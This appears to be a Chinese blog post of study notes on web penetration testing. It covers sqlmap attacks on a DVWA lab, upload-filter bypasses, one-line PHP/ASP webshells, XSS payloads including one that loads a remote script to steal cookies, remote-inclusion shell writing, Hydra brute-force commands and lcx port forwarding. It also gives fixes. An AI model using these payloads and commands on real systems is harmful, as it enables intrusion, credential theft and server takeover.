Web安全深度剖析-笔记
HTTP基础知识
http是无状态的,请求之后就响应,然后完成,连接关闭。
http请求方法
| 序号 | 方法 | 描述 |
|---|---|---|
| 1 | GET | 请求指定的页面的资源,并返回实体主体。(如果请求资源为php、jsp等,则解析后进行展示) |
| 2 | HEAD | 用于获取报头,类似于get请求,只不过返回的响应中没有具体的内容。(常用于扫描) |
| 3 | POST | 向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。常用于向服务器发送大量数据。(如请求login.php,并传递账户密码等信息) |
| 4 | PUT | 客户端向服务器传送的数据取代指定的内容。(可以在服务器端创建,一般会禁用此方法) |
| 5 | DELETE | 请求服务器删除指定的页面。(可以在服务器端删除,一般会禁用此方法) |
| 6 | CONNECT | HTTP/1.1协议中预留给能够将连接改为管道方式的代理服务器。 |
| 7 | OPTIONS | 允许客户端查看服务器的性能。(可以查看服务器端允许的请求方法,可以用来收集信息) |
| 8 | TRACE | 回显服务器收到的请求,主要用于测试或诊断。 |
http状态码
常见的HTTP状态码:
200 - 请求成功
301 - 资源(网页等)被永久转移到其它URL
302 - 重定向
400 - 请求语法错误
401 - 请求未经授权
403 - 服务器拒绝提供服务
404 - 请求的资源(网页等)不存在
500 - 内部服务器错误
http消息头(字段)
普通头:包括date消息产生的时间日期、connection指定连接的选项(连续的或不连续的)、cache-control缓存指令。
| 请求头 | 解释 |
|---|---|
| host | 域名 |
| user-agent | 客户端信息 |
| referer | 上一个页面 |
| cookie | 表示请求者身份 |
| range | 请求实体的部分内容 |
| x-forward-for | xff头,表示请求段的ip |
| accept | 客户端希望接收的消息类型 |
| accept-charset | 客户端希望接收的字符类型 |
| 响应 | 解释 |
|---|---|
| server | Web服务器的名称 |
| set-cookie | 向客户端设置cookie |
| last-modified | 资源上次修改时间 |
| location | 重定向的页面位置 |
| refresh | 定时刷新浏览器 |
| 实体头 | 解释 |
|---|---|
| content-type | 告知客户端实体的类型 |
| content-encoding | 应用到实体正文中附加内容的编码 |
| content-length | 实体正文的长度 |
| last-modified | 资源上次修改时间 |
截取HTTP请求
工具:burpsuite、fiddler
搜索引擎劫持
现象:直接输入自己网站的域名可直接登录,但是从搜索引擎搜到页面点击时,会跳转到其他页面
http头中有一个字段referer,可记录用户从哪个页面点击过来的,黑客通过user-agent字段实现搜索到从百度等搜索引擎跳转过来的访问请求时,构造一个location字段跳转到其他页面。
SQLmap注入
注意的点:
sqlmap不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点
sqlmap参数区分大小写
添加环境变量:在系统变量的path里面加上sqlmap.py的路径(前提是默认python版本是2才可以),win7的话还要添加可识别的后缀,即pathtxt。
如果你在测试的时候发现sqlmap只检测第一个参数,给URL加个英文引号或许比较好。
注入基础知识
万能密码是典型的SQL注入;
注入基本分为:数字型和字符型,数字型无需闭合引号,字符型需闭合引号;
**查询的方式:**不同的数据库通常有不同的注入方法,但原理基本相似
- 枚举表或列来提取信息
- 利用数据类型转换错误提取信息
- 从数据库系统视图获取源数据
- order by、union、having等语句
- 数据库提供的函数
- 动态执行语句
以上在手工进行SQL注入练习时将详细研究。
使用DVWA来练习使用sqlmap
SQLmap基本使用方法
python2 sqlmap.py -u "带注入点的URL"
如此便可以检测该地址是否存在注入,存在哪几种类型的注入
更多的选项
- –cookie : 如果网站需要登录则需要设置cookie值
- -u : 指定目标URL
- -b : 获取DBMS banner,即数据库信息
- –dbs : 枚举DBMS中的数据库
- –current-db : 获取当前数据库名称
- –current-user : 获取当前用户
- –users : 枚举DBMS用户
- –password : 枚举DBMS用户密码hash,一般与-users连用
- -D : 要枚举的DBMS数据库
- –tables : 枚举DBMS数据库中的数据表
- -T : 要枚举的DBMS数据表
- –columns : 枚举DBMS数据库表中的所有列
- -C: 要枚举的DBMS数据表中的列
- –dump : 转储DBMS数据表项
简述利用过程
- 带入URL和cookie信息检测是否存在注入点
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" - 加参数-b --current-db --current-user获取数据库信息,当前数据库名和当前用户等信息
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" -b --current-db --current-user - 加参数–users --password获取数据库所有用户名和密码
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" --users --password - 加参数–dbs 获取所有的数据库名
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" --dbs - 加参数-D 确定要采集信息的数据库名,加参数-tables 枚举该数据库的所有表名
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" -D dvwa --tables - 加参数-T 确定要采集信息的数据表名,加参数-columns 枚举该数据表的所有列名(字段)
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" -D dvwa -T users --columns - 加参数-C 确定感兴趣的字段名,加参数-dump将获取的表项存储下来。
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low" -D dvwa -T users -C user,password --dump
最终能够得到可以登录dvwa的所有账户密码。
Database: dvwa
Table: users
[5 entries]
+———+———+———————————————+
| user_id | user| password |
+———+———+———————————————+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) |
| 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) |
| 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+———+———+———————————————+
其他常用的参数用法
-
测试注入点权限
sqlmap.py -u "url" --privileges\测试所有用户权限
sqlmap.py -u "url" --privileges-U sa \单独测试sa用户的权限 -
执行shell命令
sqlmap.py -u [URL] --os-cmd="net user"\执行net user命令
sqlmap.py -u [URL] --os-shell\系统交互的shell -
执行SQL命令
sqlmap.py -u [URL] --sql-shell\sql交互的shell
sqlmap.py -u [URL] --sql-query='sql'\sql交互的shell -
注入http请求
DVWA安全级别medium注入方法:中级的页面提交的参数不在地址栏中显示,burp抓包显示参数在http请求的正文中,此时可通过注入http请求的方式,其它步骤基本一致
sqlmap.py -r head.txt --dbs\head.txt内容为http请求
head.txt内容如下POST /login.php HTTP/1.1 Host:127.0.0.1/dvwa User—Agent:Mozilla/5.0 username=admin&password=passwordhead.txt中最好不要直接用抓包数据,建议删掉cookie、Referer等信息。(正确性待定)
-
注入http请求2
sqlmap.py -u "url" --forms\forms参数会自动抓取post包,从而进行注入 -
将注入语句插入到指定位置
sqlmap.py -u "http://www.xxser.com/id/2*.html" —dbs\伪静态页面可以利用星号指定注入点 -
使用sqlmap插件
sqlmap.py -u [URL] -tamper "base64encode.py"\sqlmap自带的插件可以进行特殊的操作
SQLmap能检测到的注入类型
有以下5种:
- Boolean-based blind(布尔型注入)
通过判断页面返回情况获得想要的信息。 - Error-based(报错型注入)
- UNION query(可联合查询注入)
- Stacked queries(可多语句查询注入)
- Time-based blind(基于时间延迟注入)
盲注的一种,由于页面无回显,添加sleep函数,通过页面响应时间判断是否执行了函数。
其他检测SQL注入的工具
pangolin(穿山甲)、Havij(萝卜头)
上传漏洞
不对上传文件进行格式限制,导致任意文件上传,这就是一个上传漏洞
WEB解析漏洞简介
上传漏洞通常与WEB解析漏洞配合在一起
IIS6.0解析漏洞
- 当文件夹名命名为XX.asa或XX.asp时,文件夹中的所有文件都会被当做asp文件来执行
- 当文件命名为*.asp;1.jpg时,此文件会被当做asp文件来执行
- WebDav漏洞:开启webdav后,可扩展move、copy、delete等HTTP方法,此时即可put一个a.txt写入一句话木马,并通过copy或move改名为xx.asp,这样即可轻松上传一个webshell。同样可以使用delete方法删除任意文件。
APACHE漏洞
Apache在解析文件时有一个原则:当碰到不认识的扩展名时,将会从后向前解析,直到碰为止,如果都不认识,则会暴露其源代码。比如:1.php.rar ,apache不认识rar后缀,就会解析成php文件。
PHP CGI解析漏洞
Nginx曾经有两个解析漏洞,当在正常网页www.xx.com/1.jpg后面加上/xx.php时(xx.php文件不需要存在),1.jpg就会被当成PHP脚本来运行。
但此漏洞为PHP漏洞,因为PHP的配置文件中cgi.if选项默认开启向前递归解析,当xx.php文件不存在时,就解析上一级文件,造成解析漏洞。
中国菜刀与一句话木马
往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录
通常会构造图片木马,方法:
- cmd使用
copy xx.jpg/b+xx.php/a xxxx.jpg构造图片木马 - 也可以使用
edjpgcom.exe
各语言的一句话代码
asp的一句话是:
<%eval request ("pass")%>
aspx的一句话是:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
php的一句话是:
<?php @eval($_POST['pass']);?>
利用上传漏洞的方法
客户端使用JavaScript检测后缀名
绕过方法:
- 本地构造表单突破验证,或通过firebug(浏览器插件)在页面源代码中删除掉触发JavaScript检测的事件,就可以绕过验证;
- 中间人攻击方法,使用burpsuite上传正常后缀的文件,然后再传输中的HTTP层修改后缀名,需同时更改content-length值;
服务端检测文件的mime类型、检测文件扩展名
**黑名单过滤 **
绕过:找开发人员忽略的扩展名、AsP和PhP等大小写转换(win系统会忽略后缀名的大小写)、后缀名后加小数点或空格(win系统会自动忽略后缀名后的小数点或空格)
**白名单过滤 **
绕过:利用IIS 6.0解析漏洞,上传XX.asp;.jpg图片,IIS 6.0会把图片当成脚本执行。
MIME验证
mime类型用来设定某种扩展名文件的打开方式,如GIF图片的mime类型为image/gif
绕过:中间人攻击方法,上传php脚本文件后,HTTP请求头content-type值为applicat/php,将在HTTP请求中的Content-Type更改为image/jpeg类型,即可通过验证。
目录验证
如果在网页源码中可以对上传目录进行控制(修改文件上传的目录),控制文件上传到XX.php文件夹,并提交一句话图片木马,此时可利用IIS 6.0漏洞进行解析。
截断上传
上传1.asp 1.jpg(中间有空格)文件名的木马,在burpsuite的repeater功能hex选项中修改http请求包的空格的HEX值,由20改为00,即将空格改成null值。上传后文件名即为1.asp
文本编辑器上传漏洞
举例:fckeditor类似于插件,常插入到网站中,例如论坛。2.4.2版本以前有上传漏洞,可通过00截断上传脚本,获取webshell
具体方法:
- 打开某网站主页,在地址后面添加“/fckeditor“,若出现禁止访问,则判断有fckeditor编辑器;
- 在地址后面继续添加“/_whatsnew.html”就回返回fckeditor的版本信息;
- 打开存在漏洞的上传页面:地址+FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
- 上传一个asp脚本,命名为1.asp.jpg,并在burpsuite的hex中将jpg前点的二进制码改为00,即可上传成功;
- 然后即可使用菜刀连接
.htaccess文件攻击
如果可以上传自定义的htaccess文件,并覆盖掉原来的文件
可以在里面添加如下内容,意为:文件名中包含haha的文件都当做PHP文件执行,此时便可直接菜刀连接。
<FilesMatch "haha">
SetHandler application/x-httpd-php
</FilesMatch>
修复上传漏洞
上传漏洞的原因:
- 未限制上传文件类型;
- 目录过滤不严,攻击者可建立畸形目录;
- 文件未重命名,攻击者可利用web容器解析漏洞;
解决以上问题,基本可以避免上传漏洞,但不绝对。
XSS跨站脚本漏洞
xss属于客户端攻击
用户浏览嵌入恶意代码的网页时,恶意代码会在用户浏览器上执行操作,理论上与服务器无关系,只攻击用户,但网站管理员也是用户!。
- 最简单的xss举例
在网页的文本输入框内,输入<script>alert(/xss/)</script>,提交后即可弹窗 - 复杂的xss举例
在网页的文本输入框内,输入<script src="http://www.xx.com/x.txt"></script>,提交后即可从外部加载脚本,实现诸如获取用户cookie,或是监控键盘记录等等。
XSS的主要类型:反射型、存储型、DOM型
反射型
非持久性XSS,每当用户访问一个带有xss代码的网页时,服务器发送数据到用户浏览器,浏览器在解析这段xss代码,造成xss漏洞。
存储型
持久性XSS,当页面允许用户存储数据时,攻击者提交一段xss代码后被服务器接收并存储,当攻击者再次访问这个被存储的数据时,这段xss代码就会被读出来,响应给浏览器,造成xss攻击。
当存储数据时还要考虑是否需要闭合HTML代码,保证xss代码被执行。
DOM型
入门阶段不做深入研究
测试XSS漏洞
可得知输入位置(能在页面查看源码)
输入aaaaaaa<>'"&然后在源码中查找aaaaaaa,可得知程序是否对敏感字符做过滤;
无法得知输入位置
留言过后需要管理员审核的情况,无法得知数据在后台页面处于何种状态,通常采用输入/>xss test来测试
全自动测试
APPscan、AWVS、burpsuite都可以有效检测xss漏洞。但短信验证、验证码检测的页面就需要手工进行检测了
XSS会话劫持
cookie简介
cookie允许服务器存储少量的数据到客户端硬盘,并通过读取这些数据标识用户,维持会话。
cookie分内存cookie(存在时间短,浏览器关闭即消失)和硬盘cookie(存在时间较长)。
cookie通常由变量名和值组成,可能还有date用来确定失效时间、domain和path设置允许访问cookie的范围、secure加密协议才可使用cookie。还有HttpOnly字段,禁止JavaScript读取cookie,此字段可有效防止xss会话劫持。
cookie的利用
cookie有时会用来做身份验证,黑客获取到cookie即可使用burpsuite等工具实现无密码登录。
SESSION简介
用户浏览一个网页即是一个客户端与服务端的会话,被称为SESSION。
SESSION是一个随机不重复的的“编号”,随浏览器和服务器关闭。
SESSION可以存储在cookie中,作为临时cookie。cookie和SESSION的最大区别是,cookie存储于客户端,SESSION存储于服务端,其在客户端仅显示为一个ID。
当会话未关闭时,获取到session同样可以 会话劫持。
XSS框架
xss框架是一组JavaScript工具集合,如键盘记录,盗取cookie,表单劫持的等,国内最著名的是xsser.me。
XSS可能发生的场景
- 输入的数据在标签内部
最简单的的跨站,无需构造标签
<div>${input}</div>
---------------->
<div><script>alert(/xss/)</script></div> - 输入的数据在属性内部
仅仅需要闭合标签即可进行xss操作
<div class="${input}"></div>
---------------->
<div class=""><script>alert(/xss/)</script>"></div>
<div class="" onclick="alert(/xss/)"></div> - 输入的数据在事件中输出
与属性内输入相同
<img src="xx.jpg" onerror="${input}">
---------------->
<img src="xx.jpg" onerror=""><script>alert(/xss/)</script>">
<img src="xx.jpg" onerror="" onclick="alert(/xss/)"> - 在CSS中输出
css中输出同样存在xss风险
<style type="text/css">
body {background-img:url("${input}");}
</style>
---------------->
body {background-img:url("javascript:alert('xss')");} - 在script标签内输出
<script>
var usrname = "${input}"
</script>
---------------->
var usrname = "1";alert(/xss/);//"此处的//为javascropt简称js的注释标记
XSS的修复
XSS的形成,是因为未对输入和输出进行严格的过滤,导致在页面执行JavaScript等客户端脚本。
- 在HTML中对特殊字符
<>/'"&等符号进行字符转义 - 打开cookie中HttpOnly属性
此对防御xss不起作用,主要防止xss漏洞后续的cookie劫持攻击。xss的攻击手段太多,能够模拟正常操作,盗取信息,钓鱼等等,仅靠httponly不够。
命令执行漏洞
OS命令执行漏洞
OS命令执行漏洞可以直接执行系统层或应用层命令
通过客户端、页面等在服务器端执行系统命令。
产生原因:命令可连接执行
ping 8.8.8.8 && net user
其他命令连接符:如&、||、|等
举例如dvwa的命令执行漏洞。
代码执行漏洞
代码执行漏洞通过执行脚本代码来调用操作系统命令
php命令执行漏洞
主要是一些函数的参数过滤不严格所导致,可以执行OS命令的函数一共有7个:system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()
JAVA命令执行漏洞
Java SE存在runtime类,提供exec方法以执行字符串命令。
框架执行漏洞
框架,即framework。是某种应用的半成品,是一组组件,供你选用完成你自己的系统。
框架出现漏洞影响范围会比较大。
struts2代码执行漏洞
struts2是java的三大框架之一,历史上爆发多次命令执行漏洞,可以使用K8漏洞利用工具进行检测。
ThinkPHP命令执行漏洞
是一款老牌PHP框架,曾发生过任意代码执行漏洞,可插入一句话木马,使用菜刀连接。
防范命令执行漏洞
使用执行命令的函数方法要做好敏感字符过滤和转义,并确保输入可控。
“有输入的地方就有可能存在漏洞。” —— 一句老话
文件包含漏洞入门
包含漏洞经常出现在PHP语言中,文件包含漏洞分为本地包含和远程包含
本地包含
PHP中常用的文件包含函数include() require()
当包含一个php文件时会执行它(上传恶意代码来包含),当包含非php语法规范的文件时会暴露文件的内容(可用于查看配置文件)
远程包含
需要开启远程包含选项(默认关闭的)
可连接到外部网站,可连接一个其他网站的php木马,在网站执行
利用方式
-
本地包含读取敏感配置文件
-
远程包含一句话木马,意为新建一个shell.php,内容为php一句话木马内容
<?fputs(fopen("shell.php","w"),"<?php eval($_POST[xxser]);?>")?> -
利用文件上传后配合本地包含来执行
-
利用PHP自带的封装协议
php://可以用来读取php文件的内容,直接包含的话会执行PHP文件;php://input在远程包含选项开启的情况下,可以用此协议执行PHP语句; -
包含apache日志
当存在文件包含漏洞却无法找到合适的文件来利用时,可以找apache的日志文件路径(重点),然后直接访问
http://www.xxser.com/<?php info();?>再通过burp编码防止地址中的特殊符号被转码,然后就可以在日志文件中生成有完整PHP代码的日志记录,在利用包含漏洞如包含日志文件,即可执行其中的PHP代码 -
截断包含
当文件包含时被限定扩展名只能为php时(无法通过上传图片木马创建一句话木马),使用%00截断字符放在图片文件扩展名后,截断扩展名限制。仅限未对特殊字符转义的情况下。
修复方法
- 严格判断包含中的参数是否外部可控;代码层面
- 限制被包含文件所在路径,并限制目录跳转字符
../; - 为被包含文件设置白名单;
- 尽量不使用动态包含;
其他漏洞
CSRF跨站请求伪造
在浏览器和服务器的会话未结束时,利用用户的权限执行操作,别称”one click attack“
即通过输入特定的URL或者访问特定的HTML文件已达到执行某些敏感操作的目的,能够这样操作的站点均存在CSRF漏洞。
测试方法
OWASP-CSRFTester-1.0
设代理–抓取–修改参数构建HTML测试包–使用HTML测试
Burpsuite
在安全度low的dvwa的CSRF测试页面随意提交一些数据,然后抓包,右键选择Engagement tools – Generate CSRF PoC,在参数页面修改想要提交的参数值,点击左下角Generate生成攻击脚本,可直接复制URL在浏览器测试,或复制html文本到本地打开,能够达到预期的效果即存在CSRF漏洞。
解决方法
-
二次点击确认操作
-
token认证:
用户登录时随机分配一段字符串,存储在session中,提交表单参数时,token作为一个参数存在,以确认操作是不是正常请求。如果是GET请求,无参数传递,则将token值存储在cookie中,完成后更新token值。
csrf是xss的缩小版,xss危害比csrf大,如果存在xss则防范csrf无意义。
逻辑错误漏洞
逻辑漏洞:程序开发时,遗漏某些可能出现的情况,或不能正确处理,导致逻辑上的漏洞,比如越权。
越权访问:
水平越权:相同级别、权限的不同用户之间越权访问、修改或删除等操作。容易造成大批量用户信息泄露或信息恶意篡改。
垂直越权:不同级别、权限的用户之间,分为向上越权和向下越权。
密码找回逻辑漏洞:
通过邮箱找回密码的步骤一般是:1. 首先验证该用户的密码找回邮箱是否正确;2. 向该邮箱发送密码重置的链接。
如果可以抓包修改向哪个邮箱发送链接,即可使用自己的邮箱接收他人的密码重置链接。
支付逻辑漏洞:
商品数量为负数:当某购物网站未对商品的数量进行验证,修改商品数量为负数,则付款金额为负数,购买完成时自己的余额便会增加相应的数量,此为“刷钱漏洞”。
**0元购买商品:**案例:一般程序会有异常处理机制,比如尝试将某字符串转换为数字时,为了不让程序崩溃,会将此变量赋值为某个初始值(比如0)并抛出异常提示。如果没有中断此进程,这个0值可能参与接下来的程序运行。 如将单价抓包修改为字符串,产生异常后程序将单价赋值为0,如果继续付款就会以0元单价购买商品。
**指定账户恶意攻击:**案例:某拍卖行账户输入密码错误次数3次后锁定1天,如果攻击者得知竞争对手的拍卖账户,每天0点恶意尝试密码以致账户锁定,则会产生不公平竞争。
如果网站账户可以轻易获取,并存在登录失败锁定功能,则可判断其存在信息泄露或指定账户恶意攻击漏洞。
代码注入
两种定义:1,客户端提交的代码在服务器端当做动态代码或嵌入文本处理;2,客户端提交的代码未经检查就让服务器来执行。
1定义 包含OS命令执行、文件包含、动态函数调用、代码执行等;
2定义 则将SQL注入、XML注入、xss文件包含、命令执行等都视为代码注入范围。
XML注入
xml一般用于网络数据的转换和描述,而非显示。
此类型注入比较少见,利用方式为:如果某网站采用xml文件保存重要的登录信息且事先了解到xml的表结构,则通过闭合标签向xml写入数据,即可拥有随意新建账户的能力。
XPath注入
xpath是XML路径语言,可把xml文件当做数据库表,通过xpath语言进行查询,此时攻击方法类似SQL注入。
解决方法:对xpath查询语句进行预定义字符转换。
JSON注入
json是JavaScript的一种轻量级的数据交换格式,功能与xml类似。在json中插入特殊字符,如引号,仅会破坏json的表结构,导致解析失败。
解决方法:对存储到json的特殊字符进行转义。
HTTP 参数污染
HTTP请求中可以传输多个相同的参数项,而不同的web容器会选取不同位置的参数来取值,此时可利用参数污染来绕过WAF。
PHP:news.php?id=1&id=select username,password from admin--
WAF认为此请求的参数为id=1,而PHP取值select username,password from admin--
ASP:news.aspx?id=1;&id=s&id=l&id=e&id=c&id=t&
asp将会把相同参数的值链接在一起使用,此时会取值id=1;&id=select
URL跳转
客户端跳转:也称为URL重定向,浏览器地址栏会有明显的变化,在HTTP请求头中可以看到302指示。可能产生URL重定向漏洞。
服务器跳转:也称为URL转发,浏览器地址栏无变化,无法利用。
<a>标签跳转既不属于转发,也不属于重定向,<a href= "http://www.xxser.com/news.jsp">新闻列表<\a>
案例:
QQ发送求投票的钓鱼网站,打开后请求qq登录盗取QQ密码,漫游聊天记录信息进行社工,仿照被攻击的聊天习惯向好友发送诈骗信息。
webserver远程部署
Tomcat
tomcat是一个流行的Java web应用服务器,安装后默认端口为8080,Tomcat的默认部署界面存在manager管理页面,如果拥有manager权限账号即可远程管理网站,上传web shell,默认的存在admin/admin的管理密码。
JBoss
JBoss是JavaEE的开源应用服务器,一般与Tomcat或jetty绑定使用,安装后默认端口为8080,JBoss的默认部署界面存在JMX Console管理页面,且默认无需密码验证就可以远程部署webserver。
WebLogic
weblogic是BEA的一个应用服务器,基于JavaEE的中间件,安装后默认端口7001,URL后添加console即可跳转至管理界面,新版本对管理界面的密码策略要求严格,基本无法破解,老版本存在账密相同的Weblogic,system,guest,portaladmin等弱口令。
实战篇知识点
0day
原意指的是软件第一天发布就被他人破解了,现在一般指无补丁的漏洞。一般通过源代码审计来挖掘0day漏洞。
网站后台安全
主题样式可编辑可以插入一句话木马
后台文件管理功能
后台执行SQL语句管理数据库功能
备份数据库功能可以让程序将图片木马备份成脚本文件
MD5加密
普通的md5密文70%可以通过解密网站进行破解,安全的加密方法为:一次md5加密后在制定位置添加一段密文进行二次md5加密,即可提高破解难度。
拖库
知道数据库密码且支持外连接的情况下,可以使用navcat连接拖库;
不支持外连接只能通过SQL注入,提权,本地导出等方法;
综合篇知识点
暴力破解测试
SQL server数据库端口1433
Oracle数据库端口1521
MySQL数据库端口3306
DB2数据库端口5000
爆破工具Hydra
命令演示(需在hydra.exe的目录的cmd下运行):
hydra -l root -P C:/passlist.txt 192.168.1.1 mysql
指定用户root,使用密码txt文件破解密码,目标为192.168.1.1的MySQL数据库
hydra -L c:/user.txt -P c:/pass.txt -t 5 192.168.1.1 ftp
同时爆破192.168.1.1的ftp用户和密码,指定线程为5
hydra -l Administrator -P c:/pass.txt www.xxser.com rdp -V
爆破rdp(Windows远程桌面)密码
爆破工具Medusa
命令演示,工具在kali里面有集成
medusa -h 192.168.1.1 -u root -P pass.txt -M mysql
验证码爆破
一般手机邮件接收的验证码为4位数字,30min有效,只要在30min内遍历0000~9999即可爆破验证码。
防止爆破
密码复杂性、复杂的验证码、限制登录次数
旁注攻击
旁注攻击即通过与目标网站同服务器的其他网站渗透到目标网站,再通过提权获取目标站点的权限。这一过程就是旁注攻击的过程。
IP逆向查询
通过网站域名查询IP地址,再通过IP地址查询相同IP地址的站点。
如果其中一个网站存在注入点,则可能获取整个服务器上所有的数据库表。此外还能使用目录越权、构造注入点(仅用于知道数据库账密,但无法直接连接的情况)
CDN
CDN就是将原服务器上可以缓存的文件(静态文件、图片、JS、CSS等)下载到缓存服务器,当用户在访问你的域名时,将会访问缓存服务器,而不是直接去访问源服务器。
服务器使用cdn后真实IP地址会被隐藏,此时可通过1,寻找网站phpinfo()页面获取服务器配置信息;2,主域名会用cdn,子域名不一定,ping没有用cdn的子域名地址即可获取ip;3,观察IP变化,猜测真实IP地址。(3?)
提权
溢出提权:在有溢出漏洞的机器上执行溢出程序,可获得一个root shell
第三方组件提权:数据库提权(注入点或执行系统命令)、FTP提权(ftp可执行系统命令或ftp软件漏洞)、PcAnywhere远控软件提权
提权辅助:
-
3389端口:获取服务器cmdshell权限后,可通过bat代码开启RDP服务;
-
端口转发:使一个外部用户从外部连接一个在私有局域网内部上的一个端口。工具:lcx、reDuh等
简单利用方法(lcx):
- 个人主机用lcx监听500 8888端口;
lcx listen 500 8888 - 内网服务器将端口数据转发;
lcx.exe -slave 个人主机IP地址 500 127.0.0.1 3389 - 外部主机通过
mstsc 127.0.0.1:8888即可连接内网主机
原理:外部主机无法直接连接内网服务器,但可以让内网服务器主动将自己的3389发送到外部主机的指定端口上,这样通过外部主机的指定端口就可以连接内部主机主动转发的3389端口,即可实现远程控制。
- 个人主机用lcx监听500 8888端口;
-
启动项提权:编写一个创建admin账户的bat脚本,放在启动文件夹里
-
DLL劫持:任何exe文件的文件夹下如果有
lpk.dll则会运行,否则运行系统目录下的dll文件。利用工具T00ls Lpk Sethc可以制作dll文件后门。 -
添加后门:创建隐藏的账户
ARP欺骗攻击
使用arp攻击欺骗局域网内的其它主机,自己可以作为中间人截取其他主机之间的通信,还可以实现域名劫持。
防御方法包括:1,静态arp地址绑定;2,arp软件防火墙(简单操作即可追踪,拦截arp攻击)
社会工程学
《欺骗的艺术》–凯文.米特尼克
总结
18/11/5看完第一遍,只是一知半解,后续进入实战的练习中了。。。
加油吧 骚年~
7217
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
